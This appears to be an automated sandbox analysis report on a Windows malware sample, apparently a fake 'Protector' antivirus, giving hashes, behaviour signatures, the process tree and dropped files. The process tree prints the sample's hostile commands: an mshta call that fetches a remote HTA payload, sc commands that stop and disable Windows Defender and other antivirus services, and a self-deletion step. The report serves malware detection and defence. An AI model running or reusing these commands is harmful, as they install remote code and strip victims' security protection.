Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/10/2024, 05:06

General

  • Target

    81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe

  • Size

    2.0MB

  • MD5

    81bc906307d99bcb8b3aeaceb1d51b5c

  • SHA1

    9dfd66539c689b2ecaf46fdcdeebf00128e59f87

  • SHA256

    191f71d0ce6906e90271c1a713d6420759744e21455818a244f4331f38e16b08

  • SHA512

    2d1912e20c73da05e6e5ff9373620ce829647fe23c92e54b20cac74453967831b89c9b00451938fbc3b9497f16b716e756f63540929b342de4d8cec05e5eb3f5

  • SSDEEP

    49152:r5cOFNA7o0BM4wpDnqrYTHJ0I24oS6HGpwlSGnf:r5vNOoLpVuI21S6HGuR

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1

Signatures

  • Disables service(s) 3 TTPs
  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
  • Modifies registry class 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4492
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3764
        • C:\Users\Admin\AppData\Roaming\Protector-cphn.exe
          C:\Users\Admin\AppData\Roaming\Protector-cphn.exe
          4⤵
          • UAC bypass
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2776
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:456
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1476
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2268
          • C:\Windows\SysWOW64\sc.exe
            sc stop msmpsvc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3564
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2900
          • C:\Windows\SysWOW64\sc.exe
            sc config ekrn start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:780
          • C:\Windows\SysWOW64\sc.exe
            sc stop AntiVirService
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4080
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirService start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1528
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirSchedulerService start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1464
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/dnserrordiagoff.htm#http://www.cmyip.com/
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4884
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4884 CREDAT:17410 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3640
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56M04A~1.EXE" >> NUL
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1988

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

          Filesize

          471B

          MD5

          ee4ada789158c1e5a14d597cf1d5edd0

          SHA1

          9593aee78d30d51ab93d6a29dc4dc873e0d466b6

          SHA256

          903a6d82bf2fe8951104cf90d9f64aab0fbded30a2246e678a80d07868569b4f

          SHA512

          a6214f62e5089512aeaabab7c4bb38e8663fb55d5f4129c57e726723dad10802ec40c3dc836087713b77c1874c12f177bf2b2998fd3e52f4210c1c5307885c16

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

          Filesize

          404B

          MD5

          36c1eda34c01e5ce21e7bba810202b7a

          SHA1

          12a0a24749dae9e0688c402237f071df006beeb7

          SHA256

          65c8cd605767e6e40458e14088393d6d8f389a12d83add67698c613df5498a44

          SHA512

          5a615fba0a3b863d67bacf4df3d161a64dde2e0a62f994201b124973f27aa21999fc3be603b7a3f2d0c6cf04578501d1f4f617d03eed5897ecd1867599c36064

        • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver7FBA.tmp

          Filesize

          15KB

          MD5

          1a545d0052b581fbb2ab4c52133846bc

          SHA1

          62f3266a9b9925cd6d98658b92adec673cbe3dd3

          SHA256

          557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

          SHA512

          bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H4VCA4X1\suggestions[1].en-US

          Filesize

          17KB

          MD5

          5a34cb996293fde2cb7a4ac89587393a

          SHA1

          3c96c993500690d1a77873cd62bc639b3a10653f

          SHA256

          c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

          SHA512

          e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe

          Filesize

          1.9MB

          MD5

          cb29fc6c4d1be6464d118d58750c7286

          SHA1

          d942e69817be663057275b373b308f6f4a5bdea4

          SHA256

          a0ce0051ee944ea54a214588d183deb2b7e72d6aa9d9180fcd16888cf232bef9

          SHA512

          bd1891c0f015ec27c3a5f99c9b89f7f6cd87b9edd2d4e59a79ebfcb1fb35d836b597fec509ca7694ef608e2dd86e0d8d68617587fe649df8fe66db6bd6f492a7

        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe

          Filesize

          1.8MB

          MD5

          c0ecef6a5e45a04e9b341ef74a4dd08f

          SHA1

          f1d33665ab2ae2c658bbe6f64dee0986c3ba3d5a

          SHA256

          7f7b866445fd82fb423144bc7403af987a0ae4c1e27d38387a7ba84708856f5d

          SHA512

          fdb0907b853db79d32ca8a0b23fed2c31e2886d247a7d09dc6154b42af734c8ee8da08c9bc7078e9dbc53b15a24d7a85bfabaa0ccd281f314a993a23c15157ac

        • memory/2776-36-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-85-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-49-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-50-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-35-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-89-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-26-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-69-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-70-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-71-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-72-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-88-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-83-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-48-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-86-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/2776-87-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/3764-21-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB

        • memory/3764-27-0x0000000000400000-0x00000000007D9000-memory.dmp

          Filesize

          3.8MB